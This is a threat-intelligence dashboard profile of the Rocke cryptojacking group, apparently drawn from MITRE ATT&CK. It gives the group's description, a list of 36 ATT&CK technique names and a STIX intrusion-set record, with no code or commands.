Threat Actor Profile
High APT
Description

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

Confidence Score
90%
Known Aliases
Rocke
Tags
mitre-attack stix-2.1 intrusion-set
First Seen

Unknown

Last Updated

Unknown

Active Status
Active
Created

April 29, 2026

MITRE ATT&CK Techniques (36)
T1071 - Application Layer Protocol
Command and Control
T1071.001 - Web Protocols
Command and Control
T1102 - Web Service
Command and Control
T1102.001 - Dead Drop Resolver
Command and Control
T1105 - Ingress Tool Transfer
Command and Control
T1571 - Non-Standard Port
Command and Control
T1552.004 - Private Keys
Credential Access
T1014 - Rootkit
Defense Evasion
T1027 - Obfuscated Files or Information
Defense Evasion
T1027.002 - Software Packing
Defense Evasion
T1027.004 - Compile After Delivery
Defense Evasion
T1036.005 - Match Legitimate Resource Name or Locat…
Defense Evasion
T1055.002 - Portable Executable Injection
Defense Evasion
T1070.002 - Clear Linux or Mac System Logs
Defense Evasion
T1070.004 - File Deletion
Defense Evasion
T1070.006 - Timestomp
Defense Evasion
T1140 - Deobfuscate/Decode Files or Information
Defense Evasion
T1222.002 - Linux and Mac File and Directory Permis…
Defense Evasion
T1562.001 - Disable or Modify Tools
Defense Evasion
T1562.004 - Disable or Modify System Firewall
Defense Evasion
T1564.001 - Hidden Files and Directories
Defense Evasion
T1018 - Remote System Discovery
Discovery
T1046 - Network Service Discovery
Discovery
T1057 - Process Discovery
Discovery
T1082 - System Information Discovery
Discovery
T1518.001 - Security Software Discovery
Discovery
T1053.003 - Cron
Execution
T1059.004 - Unix Shell
Execution
T1059.006 - Python
Execution
T1496.001 - Compute Hijacking
Impact
T1190 - Exploit Public-Facing Application
Initial Access
T1021.004 - SSH
Lateral Movement
T1037 - Boot or Logon Initialization Scripts
Persistence
T1543.002 - Systemd Service
Persistence
T1547.001 - Registry Run Keys / Startup Folder
Persistence
T1574.006 - Dynamic Linker Hijacking
Persistence
Indicators of Compromise

Loading IOCs…

IOC KQL for Sentinel
STIX Data 
{'aliases': ['Rocke'],
 'created': '2020-05-26T14:20:20.623Z',
 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'description': '[Rocke](https://attack.mitre.org/groups/G0106) is an alleged '
                'Chinese-speaking adversary whose primary objective appeared '
                'to be cryptojacking, or stealing victim system resources for '
                'the purposes of mining cryptocurrency. The name '
                '[Rocke](https://attack.mitre.org/groups/G0106) comes from the '
                'email address "rocke@live.cn" used to create the wallet which '
                'held collected cryptocurrency. Researchers have detected '
                'overlaps between '
                '[Rocke](https://attack.mitre.org/groups/G0106) and the Iron '
                'Cybercrime Group, though this attribution has not been '
                'confirmed.(Citation: Talos Rocke August 2018)',
 'external_references': [{'external_id': 'G0106',
                          'source_name': 'mitre-attack',
                          'url': 'https://attack.mitre.org/groups/G0106'},
                         {'description': 'Liebenberg, D.. (2018, August 30). '
                                         'Rocke: The Champion of Monero '
                                         'Miners. Retrieved May 26, 2020.',
                          'source_name': 'Talos Rocke August 2018',
                          'url': 'https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html'}],
 'id': 'intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad',
 'modified': '2025-04-25T14:49:08.821Z',
 'name': 'Rocke',
 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],
 'spec_version': '2.1',
 'type': 'intrusion-set',
 'x_mitre_attack_spec_version': '3.2.0',
 'x_mitre_deprecated': False,
 'x_mitre_domains': ['enterprise-attack'],
 'x_mitre_modified_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
 'x_mitre_version': '1.0'}
Quick Actions
Related TTPs (36)
Application Layer Protocol
Command and Control
Web Protocols
Command and Control
Web Service
Command and Control
Dead Drop Resolver
Command and Control
Ingress Tool Transfer
Command and Control
View All 36 TTPs
Back to Threat Actors
Dashboard Home